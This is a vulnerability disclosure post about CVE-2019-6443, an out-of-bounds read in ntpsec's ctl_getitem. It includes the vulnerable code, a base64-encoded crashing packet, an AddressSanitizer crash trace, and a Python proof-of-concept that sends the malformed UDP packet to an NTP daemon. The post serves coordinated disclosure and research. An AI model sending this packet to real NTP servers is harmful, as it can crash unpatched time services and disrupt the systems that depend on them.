dumpco.re

_ _ / | ___| |_ ___ ___ ___ ___ _ / / | | _| . |_ -| -_| _| |_|_/ |_|_|_| | _|___|___|___| |_| 2019-01-15 Out-of-bounds read in ntpsec ============================ CVE-2019-6443 This is the first of four bugs. For more visit: https://dumpco.re/blog/ntpsec-bugs An out-of-bounds read bug was found in ntpsec. Affected versions: ntpsec 1.1.1, 1.1.2 # Timeline 2018-10-15 Bug discovered 2018-10-16 Bug reported 2019-01-13 Vendor released patch version 1.1.3 2019-01-16 MITRE allocated CVE-2019-6443 # Details The bug exists in ctl_getitem. Code snippet: 2539 /* Scan the string in the packet until we hit comma or 2540 * EoB. Register position of first '=' on the fly. */ 2541 for (tp = NULL, cp = reqpt; cp != reqend; ++cp) { // <-- cp incremented out of bounds 2542 if (*cp == '=' && tp == NULL) // <-- cp dereferenced, reading uninitialised data 2543 tp = cp; 2544 if (*cp == ',') 2545 break; 2546 } # Crash report # uname -a Linux h4xb0x 3.16.0-7-amd64 #1 SMP Debian 3.16.59-1 (2018-10-03) x86_64 GNU/Linux # sha256sum ../../bug1 a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0 ../../bug1 # base64 ../../bug1 TgID7AAAAAAAAALHdGM9EACvLCwsLPoAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsG CwvOCxQLCwsLCwsLCwsLCwsLCwshCwsLCwsLCwsLCwsLCwsLBgsLzgsLCwsLCwsLCwvk5OULCwsL IAsLCwsLCws9Yz2sCwsLCy0nCwsLCwsLCwsLCwsLC4ALCwsLCwsLCwsLCwsLCwsLCwv/CwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsCCwsLCwsYCwsLCwsLCwsLCwsLAAAAAsd0Yz0QAK8sLCws +gAA+gsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwYLC84LFAsLCwsLCwsLCwsLCwsLCyEL CwsLCwsLCwsLCwsLCwsGCwvOCwsLCwsLCwsLC+Tk5QsLCwsgCwsLCwsLCz1jPawLCwsLLScLCwsL CwsLCwsLCwsLgAsLCwsLCwsLCwsLCwsLCwsLC/8LCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwILCwsL CxgLCwsLCwsLCwsLCwsLCwsLCwsLCwsOCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLSwsL CwsLCwsLCwsLCwsLCwsLCwsLCzupSN0ABAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCw4L CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwtLCwsLCwsLCwsLCwsLCwsLCwsLCwsLO6lI3QAE CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwc= # ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5 ./build/main/ntpd/ntpd -n & sleep 1; cat ../../bug1 > /dev/udp/127.0.0.1/5123 2018-10-16T20:36:59 ntpd[18249]: INIT: ntpd ntpsec-1.1.2 2018-10-15T18:34:38Z: Starting 2018-10-16T20:36:59 ntpd[18249]: INIT: Command line: ./build/main/ntpd/ntpd -n 2018-10-16T20:36:59 ntpd[18249]: INIT: precision = 0.131 usec (-23) 2018-10-16T20:36:59 ntpd[18249]: INIT: successfully locked into RAM 2018-10-16T20:36:59 ntpd[18249]: CONFIG: readconfig: parsing file: /etc/ntp.conf restrict 0.0.0.0: KOD does nothing without LIMITED. 2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: KOD does nothing without LIMITED. 2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: notrap keyword is ignored. restrict ::: KOD does nothing without LIMITED. 2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: KOD does nothing without LIMITED. 2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: notrap keyword is ignored. 2018-10-16T20:36:59 ntpd[18249]: INIT: Using SO_TIMESTAMPNS 2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 0 v6wildcard [::]:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 1 v4wildcard 0.0.0.0:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 2 lo 127.0.0.1:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 3 eth0 192.168.245.220:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 4 eth0 192.168.245.131:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 5 lo [::1]:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 6 eth0 [fe80::50:56ff:fe38:d7b8%2]:5123 2018-10-16T20:36:59 ntpd[18249]: IO: Listening on routing socket on fd #23 for interface updates 2018-10-16T20:36:59 ntpd[18249]: statistics directory /var/NTP/ does not exist or is unwriteable, error No such file or directory ================================================================= ==18249==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd426ef680 at pc 0x55b2240a8d45 bp 0x7ffd426ee9b0 sp 0x7ffd426ee9a8 READ of size 1 at 0x7ffd426ef680 thread T0 root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# #0 0x55b2240a8d44 in ctl_getitem /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542:7 #1 0x55b22409b636 in read_sysvars /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2804:22 #2 0x55b22409b636 in read_variables /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2866 #3 0x55b22409767c in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:898:4 #4 0x55b22406991b in receive /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_proto.c:676:3 #5 0x55b22408695e in mainloop /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:982:6 #6 0x55b22408695e in ntpdmain /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:911 #7 0x55b22408695e in main /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:426 #8 0x7f5b8a657b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287 #9 0x55b22403a48c in _start (/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/ntpd/ntpd+0x10348c) Address 0x7ffd426ef680 is located in stack of thread T0 at offset 576 in frame #0 0x55b2240964bf in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:768 This frame has 1 object(s): [32, 576) 'pkt_core' <== Memory access at offset 576 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542 ctl_getitem Shadow bytes around the buggy address: 0x1000284d5e80: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 0x1000284d5e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1000284d5ed0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0x1000284d5ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000284d5f20: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc ASan internal: fe ==18249==ABORTING # Proof of concept exploit #!/usr/bin/env python import sys import socket buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" + "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" + "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" + "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" + "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" + "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + "\x0b\x07") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(buf, ('127.0.0.1', 123)) # Proof of discovery $ base64 bug1 TgID7AAAAAAAAALHdGM9EACvLCwsLPoAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsG CwvOCxQLCwsLCwsLCwsLCwsLCwshCwsLCwsLCwsLCwsLCwsLBgsLzgsLCwsLCwsLCwvk5OULCwsL IAsLCwsLCws9Yz2sCwsLCy0nCwsLCwsLCwsLCwsLC4ALCwsLCwsLCwsLCwsLCwsLCwv/CwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsCCwsLCwsYCwsLCwsLCwsLCwsLAAAAAsd0Yz0QAK8sLCws +gAA+gsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwYLC84LFAsLCwsLCwsLCwsLCwsLCyEL CwsLCwsLCwsLCwsLCwsGCwvOCwsLCwsLCwsLC+Tk5QsLCwsgCwsLCwsLCz1jPawLCwsLLScLCwsL CwsLCwsLCwsLgAsLCwsLCwsLCwsLCwsLCwsLC/8LCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwILCwsL CxgLCwsLCwsLCwsLCwsLCwsLCwsLCwsOCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLSwsL CwsLCwsLCwsLCwsLCwsLCwsLCzupSN0ABAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCw4L CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwtLCwsLCwsLCwsLCwsLCwsLCwsLCwsLO6lI3QAE CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwc= $ sha256sum bug1 a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0 bug1 https://twitter.com/magnusstubman/status/1051893954705264641 # References - ftp://ftp.ntpsec.org/pub/releases/ - https://gitlab.com/NTPsec/ntpsec/issues/507 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6443